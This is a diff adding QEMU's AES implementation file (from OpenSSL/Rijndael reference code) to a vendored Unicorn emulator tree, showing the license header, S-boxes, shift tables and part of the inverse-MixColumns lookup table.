--- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/aes.c @@ -0,0 +1,1059 @@ +/** + * + * aes.c - integrated in QEMU by Fabrice Bellard from the OpenSSL project. + */ +/* + * rijndael-alg-fst.c + * + * @version 3.0 (December 2000) + * + * Optimised ANSI C code for the Rijndael cipher (now AES) + * + * @author Vincent Rijmen + * @author Antoon Bosselaers + * @author Paulo Barreto + * + * This code is hereby placed in the public domain. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS + * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED + * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR + * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, + * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE + * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, + * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
+ */ +#include "qemu-common.h" +#include "qemu/aes.h" + +typedef uint32_t u32; +typedef uint8_t u8; + +/* This controls loop-unrolling in aes_core.c */ +#undef FULL_UNROLL +# define GETU32(pt) (((u32)(pt)[0] << 24) ^ ((u32)(pt)[1] << 16) ^ ((u32)(pt)[2] << 8) ^ ((u32)(pt)[3])) +# define PUTU32(ct, st) { (ct)[0] = (u8)((st) >> 24); (ct)[1] = (u8)((st) >> 16); (ct)[2] = (u8)((st) >> 8); (ct)[3] = (u8)(st); } + +const uint8_t AES_sbox[256] = { + 0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, + 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, + 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, + 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, + 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, + 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, + 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, + 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, + 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, + 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, + 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, + 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, + 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, + 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, + 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, + 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, + 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, + 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, + 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, + 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, + 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, + 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, + 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, + 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, + 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, + 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, + 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, + 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, + 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, + 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, + 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, + 
0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16, +}; + +const uint8_t AES_isbox[256] = { + 0x52, 0x09, 0x6A, 0xD5, 0x30, 0x36, 0xA5, 0x38, + 0xBF, 0x40, 0xA3, 0x9E, 0x81, 0xF3, 0xD7, 0xFB, + 0x7C, 0xE3, 0x39, 0x82, 0x9B, 0x2F, 0xFF, 0x87, + 0x34, 0x8E, 0x43, 0x44, 0xC4, 0xDE, 0xE9, 0xCB, + 0x54, 0x7B, 0x94, 0x32, 0xA6, 0xC2, 0x23, 0x3D, + 0xEE, 0x4C, 0x95, 0x0B, 0x42, 0xFA, 0xC3, 0x4E, + 0x08, 0x2E, 0xA1, 0x66, 0x28, 0xD9, 0x24, 0xB2, + 0x76, 0x5B, 0xA2, 0x49, 0x6D, 0x8B, 0xD1, 0x25, + 0x72, 0xF8, 0xF6, 0x64, 0x86, 0x68, 0x98, 0x16, + 0xD4, 0xA4, 0x5C, 0xCC, 0x5D, 0x65, 0xB6, 0x92, + 0x6C, 0x70, 0x48, 0x50, 0xFD, 0xED, 0xB9, 0xDA, + 0x5E, 0x15, 0x46, 0x57, 0xA7, 0x8D, 0x9D, 0x84, + 0x90, 0xD8, 0xAB, 0x00, 0x8C, 0xBC, 0xD3, 0x0A, + 0xF7, 0xE4, 0x58, 0x05, 0xB8, 0xB3, 0x45, 0x06, + 0xD0, 0x2C, 0x1E, 0x8F, 0xCA, 0x3F, 0x0F, 0x02, + 0xC1, 0xAF, 0xBD, 0x03, 0x01, 0x13, 0x8A, 0x6B, + 0x3A, 0x91, 0x11, 0x41, 0x4F, 0x67, 0xDC, 0xEA, + 0x97, 0xF2, 0xCF, 0xCE, 0xF0, 0xB4, 0xE6, 0x73, + 0x96, 0xAC, 0x74, 0x22, 0xE7, 0xAD, 0x35, 0x85, + 0xE2, 0xF9, 0x37, 0xE8, 0x1C, 0x75, 0xDF, 0x6E, + 0x47, 0xF1, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, + 0x6F, 0xB7, 0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, + 0xFC, 0x56, 0x3E, 0x4B, 0xC6, 0xD2, 0x79, 0x20, + 0x9A, 0xDB, 0xC0, 0xFE, 0x78, 0xCD, 0x5A, 0xF4, + 0x1F, 0xDD, 0xA8, 0x33, 0x88, 0x07, 0xC7, 0x31, + 0xB1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xEC, 0x5F, + 0x60, 0x51, 0x7F, 0xA9, 0x19, 0xB5, 0x4A, 0x0D, + 0x2D, 0xE5, 0x7A, 0x9F, 0x93, 0xC9, 0x9C, 0xEF, + 0xA0, 0xE0, 0x3B, 0x4D, 0xAE, 0x2A, 0xF5, 0xB0, + 0xC8, 0xEB, 0xBB, 0x3C, 0x83, 0x53, 0x99, 0x61, + 0x17, 0x2B, 0x04, 0x7E, 0xBA, 0x77, 0xD6, 0x26, + 0xE1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0C, 0x7D, +}; + +const uint8_t AES_shifts[16] = { + 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11 +}; + +const uint8_t AES_ishifts[16] = { + 0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3 +}; + +/* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ +/* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ +/* AES_imc[x][2] = 
[x].[0d, 0b, 0e, 09]; */ +/* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ +const uint32_t AES_imc[256][4] = { + { 0x00000000, 0x00000000, 0x00000000, 0x00000000, }, /* x=00 */ + { 0x0E090D0B, 0x0B0E090D, 0x0D0B0E09, 0x090D0B0E, }, /* x=01 */ + { 0x1C121A16, 0x161C121A, 0x1A161C12, 0x121A161C, }, /* x=02 */ + { 0x121B171D, 0x1D121B17, 0x171D121B, 0x1B171D12, }, /* x=03 */ + { 0x3824342C, 0x2C382434, 0x342C3824, 0x24342C38, }, /* x=04 */ + { 0x362D3927, 0x27362D39, 0x3927362D, 0x2D392736, }, /* x=05 */ + { 0x24362E3A, 0x3A24362E, 0x2E3A2436, 0x362E3A24, }, /* x=06 */ + { 0x2A3F2331, 0x312A3F23, 0x23312A3F, 0x3F23312A, }, /* x=07 */ + { 0x70486858, 0x58704868, 0x68587048, 0x48685870, }, /* x=08 */ + { 0x7E416553, 0x537E4165, 0x65537E41, 0x4165537E, }, /* x=09 */ + { 0x6C5A724E, 0x4E6C5A72, 0x724E6C5A, 0x5A724E6C, }, /* x=0A */ + { 0x62537F45, 0x4562537F, 0x7F456253, 0x537F4562, }, /* x=0B */ + { 0x486C5C74, 0x74486C5C, 0x5C74486C, 0x6C5C7448, }, /* x=0C */ + { 0x4665517F, 0x7F466551, 0x517F4665, 0x65517F46, }, /* x=0D */ + { 0x547E4662, 0x62547E46, 0x4662547E, 0x7E466254, }, /* x=0E */ + { 0x5A774B69, 0x695A774B, 0x4B695A77, 0x774B695A, }, /* x=0F */ + { 0xE090D0B0, 0xB0E090D0, 0xD0B0E090, 0x90D0B0E0, }, /* x=10 */ + { 0xEE99DDBB, 0xBBEE99DD, 0xDDBBEE99, 0x99DDBBEE, }, /* x=11 */ + { 0xFC82CAA6, 0xA6FC82CA, 0xCAA6FC82, 0x82CAA6FC, }, /* x=12 */ + { 0xF28BC7AD, 0xADF28BC7, 0xC7ADF28B, 0x8BC7ADF2, }, /* x=13 */ + { 0xD8B4E49C, 0x9CD8B4E4, 0xE49CD8B4, 0xB4E49CD8, }, /* x=14 */ + { 0xD6BDE997, 0x97D6BDE9, 0xE997D6BD, 0xBDE997D6, }, /* x=15 */ + { 0xC4A6FE8A, 0x8AC4A6FE, 0xFE8AC4A6, 0xA6FE8AC4, }, /* x=16 */ + { 0xCAAFF381, 0x81CAAFF3, 0xF381CAAF, 0xAFF381CA, }, /* x=17 */ + { 0x90D8B8E8, 0xE890D8B8, 0xB8E890D8, 0xD8B8E890, }, /* x=18 */ + { 0x9ED1B5E3, 0xE39ED1B5, 0xB5E39ED1, 0xD1B5E39E, }, /* x=19 */ + { 0x8CCAA2FE, 0xFE8CCAA2, 0xA2FE8CCA, 0xCAA2FE8C, }, /* x=1A */ + { 0x82C3AFF5, 0xF582C3AF, 0xAFF582C3, 0xC3AFF582, }, /* x=1B */ + { 0xA8FC8CC4, 0xC4A8FC8C, 0x8CC4A8FC, 
0xFC8CC4A8, }, /* x=1C */ + { 0xA6F581CF, 0xCFA6F581, 0x81CFA6F5, 0xF581CFA6, }, /* x=1D */ + { 0xB4EE96D2, 0xD2B4EE96, 0x96D2B4EE, 0xEE96D2B4, }, /* x=1E */ + { 0xBAE79BD9, 0xD9BAE79B, 0x9BD9BAE7, 0xE79BD9BA, }, /* x=1F */ + { 0xDB3BBB7B, 0x7BDB3BBB, 0xBB7BDB3B, 0x3BBB7BDB, }, /* x=20 */ + { 0xD532B670, 0x70D532B6, 0xB670D532, 0x32B670D5, }, /* x=21 */ + { 0xC729A16D, 0x6DC729A1, 0xA16DC729, 0x29A16DC7, }, /* x=22 */ + { 0xC920AC66, 0x66C920AC, 0xAC66C920, 0x20AC66C9, }, /* x=23 */ + { 0xE31F8F57, 0x57E31F8F, 0x8F57E31F, 0x1F8F57E3, }, /* x=24 */ + { 0xED16825C, 0x5CED1682, 0x825CED16, 0x16825CED, }, /* x=25 */ + { 0xFF0D9541, 0x41FF0D95, 0x9541FF0D, 0x0D9541FF, }, /* x=26 */ + { 0xF104984A, 0x4AF10498, 0x984AF104, 0x04984AF1, }, /* x=27 */ + { 0xAB73D323, 0x23AB73D3, 0xD323AB73, 0x73D323AB, }, /* x=28 */ + { 0xA57ADE28, 0x28A57ADE, 0xDE28A57A, 0x7ADE28A5, }, /* x=29 */ + { 0xB761C935, 0x35B761C9, 0xC935B761, 0x61C935B7, }, /* x=2A */ + { 0xB968C43E, 0x3EB968C4, 0xC43EB968, 0x68C43EB9, }, /* x=2B */ + { 0x9357E70F, 0x0F9357E7, 0xE70F9357, 0x57E70F93, }, /* x=2C */ + { 0x9D5EEA04, 0x049D5EEA, 0xEA049D5E, 0x5EEA049D, }, /* x=2D */ + { 0x8F45FD19, 0x198F45FD, 0xFD198F45, 0x45FD198F, }, /* x=2E */ + { 0x814CF012, 0x12814CF0, 0xF012814C, 0x4CF01281, }, /* x=2F */ + { 0x3BAB6BCB, 0xCB3BAB6B, 0x6BCB3BAB, 0xAB6BCB3B, }, /* x=30 */ + { 0x35A266C0, 0xC035A266, 0x66C035A2, 0xA266C035, }, /* x=31 */ + { 0x27B971DD, 0xDD27B971, 0x71DD27B9, 0xB971DD27, }, /* x=32 */ + { 0x29B07CD6, 0xD629B07C, 0x7CD629B0, 0xB07CD629, }, /* x=33 */ + { 0x038F5FE7, 0xE7038F5F, 0x5FE7038F, 0x8F5FE703, }, /* x=34 */ + { 0x0D8652EC, 0xEC0D8652, 0x52EC0D86, 0x8652EC0D, }, /* x=35 */ + { 0x1F9D45F1, 0xF11F9D45, 0x45F11F9D, 0x9D45F11F, }, /* x=36 */ + { 0x119448FA, 0xFA119448, 0x48FA1194, 0x9448FA11, }, /* x=37 */ + { 0x4BE30393, 0x934BE303, 0x03934BE3, 0xE303934B, }, /* x=38 */ + { 0x45EA0E98, 0x9845EA0E, 0x0E9845EA, 0xEA0E9845, }, /* x=39 */ + { 0x57F11985, 0x8557F119, 0x198557F1, 0xF1198557, }, /* 
x=3A */ + { 0x59F8148E, 0x8E59F814, 0x148E59F8, 0xF8148E59, }, /* x=3B */ + { 0x73C737BF, 0xBF73C737, 0x37BF73C7, 0xC737BF73, }, /* x=3C */ + { 0x7DCE3AB4, 0xB47DCE3A, 0x3AB47DCE, 0xCE3AB47D, }, /* x=3D */ + { 0x6FD52DA9, 0xA96FD52D, 0x2DA96FD5, 0xD52DA96F, }, /* x=3E */ + { 0x61DC20A2, 0xA261DC20, 0x20A261DC, 0xDC20A261, }, /* x=3F */ + { 0xAD766DF6, 0xF6AD766D, 0x6DF6AD76, 0x766DF6AD, }, /* x=40 */ + { 0xA37F60FD, 0xFDA37F60, 0x60FDA37F, 0x7F60FDA3, }, /* x=41 */ + { 0xB16477E0, 0xE0B16477, 0x77E0B164, 0x6477E0B1, }, /* x=42 */ + { 0xBF6D7AEB, 0xEBBF6D7A, 0x7AEBBF6D, 0x6D7AEBBF, }, /* x=43 */ + { 0x955259DA, 0xDA955259, 0x59DA9552, 0x5259DA95, }, /* x=44 */ + { 0x9B5B54D1, 0xD19B5B54, 0x54D19B5B, 0x5B54D19B, }, /* x=45 */ + { 0x894043CC, 0xCC894043, 0x43CC8940, 0x4043CC89, }, /* x=46 */ + { 0x87494EC7, 0xC787494E, 0x4EC78749, 0x494EC787, }, /* x=47 */ + { 0xDD3E05AE, 0xAEDD3E05, 0x05AEDD3E, 0x3E05AEDD, }, /* x=48 */ + { 0xD33708A5, 0xA5D33708, 0x08A5D337, 0x3708A5D3, }, /* x=49 */ + { 0xC12C1FB8, 0xB8C12C1F, 0x1FB8C12C, 0x2C1FB8C1, }, /* x=4A */ + { 0xCF2512B3, 0xB3CF2512, 0x12B3CF25, 0x2512B3CF, }, /* x=4B */ + { 0xE51A3182, 0x82E51A31, 0x3182E51A, 0x1A3182E5, }, /* x=4C */ + { 0xEB133C89, 0x89EB133C, 0x3C89EB13, 0x133C89EB, }, /* x=4D */ + { 0xF9082B94, 0x94F9082B, 0x2B94F908, 0x082B94F9, }, /* x=4E */ + { 0xF701269F, 0x9FF70126, 0x269FF701, 0x01269FF7, }, /* x=4F */ + { 0x4DE6BD46, 0x464DE6BD, 0xBD464DE6, 0xE6BD464D, }, /* x=50 */ + { 0x43EFB04D, 0x4D43EFB0, 0xB04D43EF, 0xEFB04D43, }, /* x=51 */ + { 0x51F4A750, 0x5051F4A7, 0xA75051F4, 0xF4A75051, }, /* x=52 */ + { 0x5FFDAA5B, 0x5B5FFDAA, 0xAA5B5FFD, 0xFDAA5B5F, }, /* x=53 */ + { 0x75C2896A, 0x6A75C289, 0x896A75C2, 0xC2896A75, }, /* x=54 */ + { 0x7BCB8461, 0x617BCB84, 0x84617BCB, 0xCB84617B, }, /* x=55 */ + { 0x69D0937C, 0x7C69D093, 0x937C69D0, 0xD0937C69, }, /* x=56 */ + { 0x67D99E77, 0x7767D99E, 0x9E7767D9, 0xD99E7767, }, /* x=57 */ + { 0x3DAED51E, 0x1E3DAED5, 0xD51E3DAE, 0xAED51E3D, }, /* x=58 */ + { 
0x33A7D815, 0x1533A7D8, 0xD81533A7, 0xA7D81533, }, /* x=59 */ + { 0x21BCCF08, 0x0821BCCF, 0xCF0821BC, 0xBCCF0821, }, /* x=5A */ + { 0x2FB5C203, 0x032FB5C2, 0xC2032FB5, 0xB5C2032F, }, /* x=5B */ + { 0x058AE132, 0x32058AE1, 0xE132058A, 0x8AE13205, }, /* x=5C */ + { 0x0B83EC39, 0x390B83EC, 0xEC390B83, 0x83EC390B, }, /* x=5D */ + { 0x1998FB24, 0x241998FB, 0xFB241998, 0x98FB2419, }, /* x=5E */ + { 0x1791F62F, 0x2F1791F6, 0xF62F1791, 0x91F62F17, }, /* x=5F */ + { 0x764DD68D, 0x8D764DD6, 0xD68D764D, 0x4DD68D76, }, /* x=60 */ + { 0x7844DB86, 0x867844DB, 0xDB867844, 0x44DB8678, }, /* x=61 */ + { 0x6A5FCC9B, 0x9B6A5FCC, 0xCC9B6A5F, 0x5FCC9B6A, }, /* x=62 */ + { 0x6456C190, 0x906456C1, 0xC1906456, 0x56C19064, }, /* x=63 */ + { 0x4E69E2A1, 0xA14E69E2, 0xE2A14E69, 0x69E2A14E, }, /* x=64 */ + { 0x4060EFAA, 0xAA4060EF, 0xEFAA4060, 0x60EFAA40, }, /* x=65 */ + { 0x527BF8B7, 0xB7527BF8, 0xF8B7527B, 0x7BF8B752, }, /* x=66 */ + { 0x5C72F5BC, 0xBC5C72F5, 0xF5BC5C72, 0x72F5BC5C, }, /* x=67 */ + { 0x0605BED5, 0xD50605BE, 0xBED50605, 0x05BED506, }, /* x=68 */ + { 0x080CB3DE, 0xDE080CB3, 0xB3DE080C, 0x0CB3DE08, }, /* x=69 */ + { 0x1A17A4C3, 0xC31A17A4, 0xA4C31A17, 0x17A4C31A, }, /* x=6A */ + { 0x141EA9C8, 0xC8141EA9, 0xA9C8141E, 0x1EA9C814, }, /* x=6B */ + { 0x3E218AF9, 0xF93E218A, 0x8AF93E21, 0x218AF93E, }, /* x=6C */ + { 0x302887F2, 0xF2302887, 0x87F23028, 0x2887F230, }, /* x=6D */ + { 0x223390EF, 0xEF223390, 0x90EF2233, 0x3390EF22, }, /* x=6E */ + { 0x2C3A9DE4, 0xE42C3A9D, 0x9DE42C3A, 0x3A9DE42C, }, /* x=6F */ + { 0x96DD063D, 0x3D96DD06, 0x063D96DD, 0xDD063D96, }, /* x=70 */ + { 0x98D40B36, 0x3698D40B, 0x0B3698D4, 0xD40B3698, }, /* x=71 */ + { 0x8ACF1C2B, 0x2B8ACF1C, 0x1C2B8ACF, 0xCF1C2B8A, }, /* x=72 */ + { 0x84C61120, 0x2084C611, 0x112084C6, 0xC6112084, }, /* x=73 */ + { 0xAEF93211, 0x11AEF932, 0x3211AEF9, 0xF93211AE, }, /* x=74 */ + { 0xA0F03F1A, 0x1AA0F03F, 0x3F1AA0F0, 0xF03F1AA0, }, /* x=75 */ + { 0xB2EB2807, 0x07B2EB28, 0x2807B2EB, 0xEB2807B2, }, /* x=76 */ + { 0xBCE2250C, 
0x0CBCE225, 0x250CBCE2, 0xE2250CBC, }, /* x=77 */ + { 0xE6956E65, 0x65E6956E, 0x6E65E695, 0x956E65E6, }, /* x=78 */ + { 0xE89C636E, 0x6EE89C63, 0x636EE89C, 0x9C636EE8, }, /* x=79 */ + { 0xFA877473, 0x73FA8774, 0x7473FA87, 0x877473FA, }, /* x=7A */ + { 0xF48E7978, 0x78F48E79, 0x7978F48E, 0x8E7978F4, }, /* x=7B */ + { 0xDEB15A49, 0x49DEB15A, 0x5A49DEB1, 0xB15A49DE, }, /* x=7C */ + { 0xD0B85742, 0x42D0B857, 0x5742D0B8, 0xB85742D0, }, /* x=7D */ + { 0xC2A3405F, 0x5FC2A340, 0x405FC2A3, 0xA3405FC2, }, /* x=7E */ + { 0xCCAA4D54, 0x54CCAA4D, 0x4D54CCAA, 0xAA4D54CC, }, /* x=7F */ + { 0x41ECDAF7, 0xF741ECDA, 0xDAF741EC, 0xECDAF741, }, /* x=80 */ + { 0x4FE5D7FC, 0xFC4FE5D7, 0xD7FC4FE5, 0xE5D7FC4F, }, /* x=81 */ + { 0x5DFEC0E1, 0xE15DFEC0, 0xC0E15DFE, 0xFEC0E15D, }, /* x=82 */ + { 0x53F7CDEA, 0xEA53F7CD, 0xCDEA53F7, 0xF7CDEA53, }, /* x=83 */ + { 0x79C8EEDB, 0xDB79C8EE, 0xEEDB79C8, 0xC8EEDB79, }, /* x=84 */ + { 0x77C1E3D0, 0xD077C1E3, 0xE3D077C1, 0xC1E3D077, }, /* x=85 */ + { 0x65DAF4CD, 0xCD65DAF4, 0xF4CD65DA, 0xDAF4CD65, }, /* x=86 */ + { 0x6BD3F9C6, 0xC66BD3F9, 0xF9C66BD3, 0xD3F9C66B, }, /* x=87 */ + { 0x31A4B2AF, 0xAF31A4B2, 0xB2AF31A4, 0xA4B2AF31, }, /* x=88 */ + { 0x3FADBFA4, 0xA43FADBF, 0xBFA43FAD, 0xADBFA43F, }, /* x=89 */ + { 0x2DB6A8B9, 0xB92DB6A8, 0xA8B92DB6, 0xB6A8B92D, }, /* x=8A */ + { 0x23BFA5B2, 0xB223BFA5, 0xA5B223BF, 0xBFA5B223, }, /* x=8B */ + { 0x09808683, 0x83098086, 0x86830980, 0x80868309, }, /* x=8C */ + { 0x07898B88, 0x8807898B, 0x8B880789, 0x898B8807, }, /* x=8D */ + { 0x15929C95, 0x9515929C, 0x9C951592, 0x929C9515, }, /* x=8E */ + { 0x1B9B919E, 0x9E1B9B91, 0x919E1B9B, 0x9B919E1B, }, /* x=8F */ + { 0xA17C0A47, 0x47A17C0A, 0x0A47A17C, 0x7C0A47A1, }, /* x=90 */ + { 0xAF75074C, 0x4CAF7507, 0x074CAF75, 0x75074CAF, }, /* x=91 */ + { 0xBD6E1051, 0x51BD6E10, 0x1051BD6E, 0x6E1051BD, }, /* x=92 */ + { 0xB3671D5A, 0x5AB3671D, 0x1D5AB367, 0x671D5AB3, }, /* x=93 */ + { 0x99583E6B, 0x6B99583E, 0x3E6B9958, 0x583E6B99, }, /* x=94 */ + { 0x97513360, 0x60975133, 
0x33609751, 0x51336097, }, /* x=95 */ + { 0x854A247D, 0x7D854A24, 0x247D854A, 0x4A247D85, }, /* x=96 */ + { 0x8B432976, 0x768B4329, 0x29768B43, 0x4329768B, }, /* x=97 */ + { 0xD134621F, 0x1FD13462, 0x621FD134, 0x34621FD1, }, /* x=98 */ + { 0xDF3D6F14, 0x14DF3D6F, 0x6F14DF3D, 0x3D6F14DF, }, /* x=99 */ + { 0xCD267809, 0x09CD2678, 0x7809CD26, 0x267809CD, }, /* x=9A */ + { 0xC32F7502, 0x02C32F75, 0x7502C32F, 0x2F7502C3, }, /* x=9B */ + { 0xE9105633, 0x33E91056, 0x5633E910, 0x105633E9, }, /* x=9C */ + { 0xE7195B38, 0x38E7195B, 0x5B38E719, 0x195B38E7, }, /* x=9D */ + { 0xF5024C25, 0x25F5024C, 0x4C25F502, 0x024C25F5, }, /* x=9E */ + { 0xFB0B412E, 0x2EFB0B41, 0x412EFB0B, 0x0B412EFB, }, /* x=9F */ + { 0x9AD7618C, 0x8C9AD761, 0x618C9AD7, 0xD7618C9A, }, /* x=A0 */ + { 0x94DE6C87, 0x8794DE6C, 0x6C8794DE, 0xDE6C8794, }, /* x=A1 */ + { 0x86C57B9A, 0x9A86C57B, 0x7B9A86C5, 0xC57B9A86, }, /* x=A2 */ + { 0x88CC7691, 0x9188CC76, 0x769188CC, 0xCC769188, }, /* x=A3 */ + { 0xA2F355A0, 0xA0A2F355, 0x55A0A2F3, 0xF355A0A2, }, /* x=A4 */ + { 0xACFA58AB, 0xABACFA58, 0x58ABACFA, 0xFA58ABAC, }, /* x=A5 */ + { 0xBEE14FB6, 0xB6BEE14F, 0x4FB6BEE1, 0xE14FB6BE, }, /* x=A6 */ + { 0xB0E842BD, 0xBDB0E842, 0x42BDB0E8, 0xE842BDB0, }, /* x=A7 */ + { 0xEA9F09D4, 0xD4EA9F09, 0x09D4EA9F, 0x9F09D4EA, }, /* x=A8 */ + { 0xE49604DF, 0xDFE49604, 0x04DFE496, 0x9604DFE4, }, /* x=A9 */ + { 0xF68D13C2, 0xC2F68D13, 0x13C2F68D, 0x8D13C2F6, }, /* x=AA */ + { 0xF8841EC9, 0xC9F8841E, 0x1EC9F884, 0x841EC9F8, }, /* x=AB */ + { 0xD2BB3DF8, 0xF8D2BB3D, 0x3DF8D2BB, 0xBB3DF8D2, }, /* x=AC */ + { 0xDCB230F3, 0xF3DCB230, 0x30F3DCB2, 0xB230F3DC, }, /* x=AD */ + { 0xCEA927EE, 0xEECEA927, 0x27EECEA9, 0xA927EECE, }, /* x=AE */ + { 0xC0A02AE5, 0xE5C0A02A, 0x2AE5C0A0, 0xA02AE5C0, }, /* x=AF */ + { 0x7A47B13C, 0x3C7A47B1, 0xB13C7A47, 0x47B13C7A, }, /* x=B0 */ + { 0x744EBC37, 0x37744EBC, 0xBC37744E, 0x4EBC3774, }, /* x=B1 */ + { 0x6655AB2A, 0x2A6655AB, 0xAB2A6655, 0x55AB2A66, }, /* x=B2 */ + { 0x685CA621, 0x21685CA6, 0xA621685C, 
0x5CA62168, }, /* x=B3 */ + { 0x42638510, 0x10426385, 0x85104263, 0x63851042, }, /* x=B4 */ + { 0x4C6A881B, 0x1B4C6A88, 0x881B4C6A, 0x6A881B4C, }, /* x=B5 */ + { 0x5E719F06, 0x065E719F, 0x9F065E71, 0x719F065E, }, /* x=B6 */ + { 0x5078920D, 0x0D507892, 0x920D5078, 0x78920D50, }, /* x=B7 */ + { 0x0A0FD964, 0x640A0FD9, 0xD9640A0F, 0x0FD9640A, }, /* x=B8 */ + { 0x0406D46F, 0x6F0406D4, 0xD46F0406, 0x06D46F04, }, /* x=B9 */ + { 0x161DC372, 0x72161DC3, 0xC372161D, 0x1DC37216, }, /* x=BA */ + { 0x1814CE79, 0x791814CE, 0xCE791814, 0x14CE7918, }, /* x=BB */ + { 0x322BED48, 0x48322BED, 0xED48322B, 0x2BED4832, }, /* x=BC */ + { 0x3C22E043, 0x433C22E0, 0xE0433C22, 0x22E0433C, }, /* x=BD */ + { 0x2E39F75E, 0x5E2E39F7, 0xF75E2E39, 0x39F75E2E, }, /* x=BE */ + { 0x2030FA55, 0x552030FA, 0xFA552030, 0x30FA5520, }, /* x=BF */ + { 0xEC9AB701, 0x01EC9AB7, 0xB701EC9A, 0x9AB701EC, }, /* x=C0 */ + { 0xE293BA0A, 0x0AE293BA, 0xBA0AE293, 0x93BA0AE2, }, /* x=C1 */ + { 0xF088AD17, 0x17F088AD, 0xAD17F088, 0x88AD17F0, }, /* x=C2 */ + { 0xFE81A01C, 0x1CFE81A0, 0xA01CFE81, 0x81A01CFE, }, /* x=C3 */ + { 0xD4BE832D, 0x2DD4BE83, 0x832DD4BE, 0xBE832DD4, }, /* x=C4 */ + { 0xDAB78E26, 0x26DAB78E, 0x8E26DAB7, 0xB78E26DA, }, /* x=C5 */ + { 0xC8AC993B, 0x3BC8AC99, 0x993BC8AC, 0xAC993BC8, }, /* x=C6 */ + { 0xC6A59430, 0x30C6A594, 0x9430C6A5, 0xA59430C6, }, /* x=C7 */ + { 0x9CD2DF59, 0x599CD2DF, 0xDF599CD2, 0xD2DF599C, }, /* x=C8 */ + { 0x92DBD252, 0x5292DBD2, 0xD25292DB, 0xDBD25292, }, /* x=C9 */ + { 0x80C0C54F, 0x4F80C0C5, 0xC54F80C0, 0xC0C54F80, }, /* x=CA */ + { 0x8EC9C844, 0x448EC9C8, 0xC8448EC9, 0xC9C8448E, }, /* x=CB */ + { 0xA4F6EB75, 0x75A4F6EB, 0xEB75A4F6, 0xF6EB75A4, }, /* x=CC */ + { 0xAAFFE67E, 0x7EAAFFE6, 0xE67EAAFF, 0xFFE67EAA, }, /* x=CD */ + { 0xB8E4F163, 0x63B8E4F1, 0xF163B8E4, 0xE4F163B8, }, /* x=CE */ + { 0xB6EDFC68, 0x68B6EDFC, 0xFC68B6ED, 0xEDFC68B6, }, /* x=CF */ + { 0x0C0A67B1, 0xB10C0A67, 0x67B10C0A, 0x0A67B10C, }, /* x=D0 */ + { 0x02036ABA, 0xBA02036A, 0x6ABA0203, 0x036ABA02, }, /* 
